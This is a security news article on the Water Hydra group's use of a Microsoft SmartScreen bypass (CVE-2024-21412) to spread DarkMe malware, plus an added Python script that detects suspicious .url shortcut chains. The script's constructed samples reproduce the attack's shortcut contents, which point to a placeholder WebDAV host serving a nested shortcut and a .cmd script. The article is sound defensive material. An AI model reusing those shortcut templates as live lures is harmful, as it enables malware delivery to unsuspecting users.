DarkMe Malware Exploits Zero-Day Vulnerability in Microsoft SmartScreen, Targeting Financial Traders

Stay vigilant and keep your devices updated to avoid such threats


Trend Micro's cybersecurity researchers have disclosed that an advanced persistent threat (APT) actor tracked as Water Hydra, also known as DarkCasino, has been exploiting a security flaw in Microsoft Defender SmartScreen as a zero-day.

The researchers have been tracking the campaign since late December 2023. It exploits CVE-2024-21412, a security-feature bypass in the handling of Internet Shortcut files (.URL).

In a report on Tuesday, the cybersecurity firm said:

In this attack chain, the threat actor leveraged CVE-2024-21412 to bypass Microsoft Defender SmartScreen and infect victims with the DarkMe malware.

Microsoft fixed the vulnerability in its February Patch Tuesday update and warned that an unauthenticated attacker could exploit the flaw by sending a specially crafted file to the targeted user, bypassing the security checks that would normally be displayed.

However, the attack only succeeds if the victim clicks the file link and views the attacker-controlled content.

The infection chain, as Trend Micro describes it, exploits CVE-2024-21412 to drop a malicious installer file, 7z.msi.

This happens when the victim clicks the malicious link (fxbulls[.]ru), which is distributed on forex trading forums.

The URL is disguised as a link to a stock chart image, but it actually leads to an Internet Shortcut file (photo_2023-12-29.jpg.url).

According to security researchers Peter Girnus, Aliakbar Zahravi, and Simon Zuckerbraun:

The landing page on fxbulls[.]ru contains a link to a malicious WebDAV share with a filtered crafted view. When users click on this link, the browser will ask them to open the link in Windows Explorer. This is not a security prompt, so the user might not think that this link is malicious.

The threat actor abuses the search: application protocol, which invokes the Windows desktop search application and has a history of being abused to deliver malware.

This deceptive Internet Shortcut file points to a second shortcut file hosted on a remote server, 2.url, which in turn points to a Command Prompt batch script inside a ZIP archive, a2.zip/a2.cmd.

The purpose of this layered referencing is to evade SmartScreen: across the chain of shortcuts it fails to properly apply the Mark of the Web (MotW), the Windows tag that triggers a warning when a file from an untrusted source is opened.
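The chain above (a .url named like an image, the search: protocol handler, a remote WebDAV share, and one shortcut pointing at another shortcut or script) can be triaged from the shortcut files themselves. The following Python script is an added example, not code from the article, Trend Micro, or Microsoft. It parses the INI-style [InternetShortcut] section, reports each of those traits, and also reads a Zone.Identifier stream to show what the Mark of the Web actually is (ZoneId=3). The shortcut contents, the host webdav.example.invalid and all paths are constructed placeholders; only the file names photo_2023-12-29.jpg.url, 2.url and a2.zip/a2.cmd come from the article.

```python
"""Triage helper for Windows Internet Shortcut (.url) files.

Added example (not Trend Micro's or Microsoft's code). It flags the traits of
the chain the article describes: a double extension that hides the .url
suffix, the search: protocol handler, a target on a remote WebDAV/UNC share,
and a target that is itself a shortcut or script rather than a document.
The sample shortcut contents below are constructed; the host name and paths
are placeholders, not indicators from the campaign.
"""
import configparser
import re
from urllib.parse import urlparse

# Extensions that mean "the shortcut leads to more code, not to a document".
CHAINED_EXTS = {".url", ".lnk", ".cmd", ".bat", ".ps1", ".vbs", ".js", ".hta"}
# Image/document suffix immediately before the real .url suffix.
DOUBLE_EXT_RE = re.compile(r"\.(jpe?g|png|gif|bmp|pdf|docx?|xlsx?)\.url$")
# UNC path such as \\host@SSL\DavWWWRoot\2.url, also when embedded in a query.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._@-]+)\\([^\s&\"']*)")


def parse_url_file(text):
    """Return the URL= value of the [InternetShortcut] section, or None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    try:
        cp.read_string(text.replace("\r\n", "\n"))
    except configparser.Error:
        return None
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            for key, value in cp.items(section):
                if key.lower() == "url":
                    return value.strip()
    return None


def remote_targets(url):
    """(host, path) pairs the shortcut reaches over the network: file:// URLs
    with a host part, plus UNC paths anywhere in the string (a search: URL
    carries its location inside the query)."""
    targets = []
    parsed = urlparse(url)
    if parsed.scheme.lower() == "file" and parsed.netloc:
        targets.append((parsed.netloc, parsed.path))
    for m in UNC_RE.finditer(url):
        targets.append((m.group(1), "\\" + m.group(2)))
    return targets


def is_webdav(host, path):
    """WebDAV redirector conventions: host@SSL[@port] and the DavWWWRoot alias."""
    return "@ssl" in host.lower() or "davwwwroot" in path.lower()


def target_ext(path):
    """Extension of the last path component, accepting / and \\ separators."""
    name = re.split(r"[\\/]", path)[-1]
    dot = name.rfind(".")
    return name[dot:].lower() if dot >= 0 else ""


def assess_shortcut(filename, text):
    """Findings for one .url file; an empty list means nothing suspicious."""
    findings = []
    if DOUBLE_EXT_RE.search(filename.lower()):
        findings.append("double extension: named like an image/document but is a .url")
    url = parse_url_file(text)
    if url is None:
        findings.append("no URL= entry in [InternetShortcut]")
        return findings
    if urlparse(url).scheme.lower() == "search":
        findings.append("search: protocol handler invoked from a shortcut")
    for host, path in remote_targets(url):
        kind = "WebDAV" if is_webdav(host, path) else "remote file share"
        findings.append(f"target on {kind} host {host}")
        ext = target_ext(path)
        if ext in CHAINED_EXTS:
            findings.append(f"target is a {ext} file: nested shortcut or script, not a document")
    return findings


def zone_id(zone_identifier_text):
    """ZoneId from a Zone.Identifier alternate data stream (3 = Internet, the
    Mark of the Web); None if the stream is missing or malformed."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(zone_identifier_text.replace("\r\n", "\n"))
        return cp.getint("ZoneTransfer", "ZoneId")
    except (configparser.Error, ValueError):
        return None


# Constructed samples (placeholders, not captured artifacts). File names are
# the ones the article mentions; the host and paths are invented.
SAMPLE_STAGE1 = r"""[InternetShortcut]
URL=search:query=photo&crumb=location:\\webdav.example.invalid@SSL\DavWWWRoot\2.url
"""
SAMPLE_STAGE2 = r"""[InternetShortcut]
URL=file://webdav.example.invalid@SSL/DavWWWRoot/a2.zip/a2.cmd
"""
SAMPLE_BENIGN = r"""[InternetShortcut]
URL=https://example.com/chart.png
"""

if __name__ == "__main__":
    for name, text in [("photo_2023-12-29.jpg.url", SAMPLE_STAGE1),
                       ("2.url", SAMPLE_STAGE2), ("chart.url", SAMPLE_BENIGN)]:
        print(name, assess_shortcut(name, text) or ["clean"])
    print("ZoneId:", zone_id("[ZoneTransfer]\r\nZoneId=3\r\n"))
```

On a real host you would feed assess_shortcut the bytes of each .url file found in Downloads, browser caches or mail attachments, and zone_id the contents of its file:Zone.Identifier stream; a shortcut whose target is a remote WebDAV share and another shortcut is worth a second look even when the stream is absent, because the bypass the article describes is precisely that the downstream files never receive the mark.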


The campaign's final objective is to quietly deliver the Visual Basic trojan DarkMe while keeping up the facade of showing the victim a stock chart throughout the exploitation and infection chain.

DarkMe can download and execute additional instructions, communicate with a command-and-control (C2) server, and collect information from the compromised device.

The discovery of this zero-day exploit has raised concerns about the growing sophistication of attacker tactics.

The researchers at Trend Micro also mentioned:

Water Hydra possesses the technical knowledge and tools to discover and exploit zero-day vulnerabilities in advanced campaigns, deploying highly destructive malware such as DarkMe.

As the cybersecurity community responds to these emerging threats, stay vigilant and install all security updates promptly to keep your devices protected against ever-evolving cyber threats.

What steps do you take to avoid these attacks? Share the tips & tricks you follow to stay away from these threats in the comments section below.
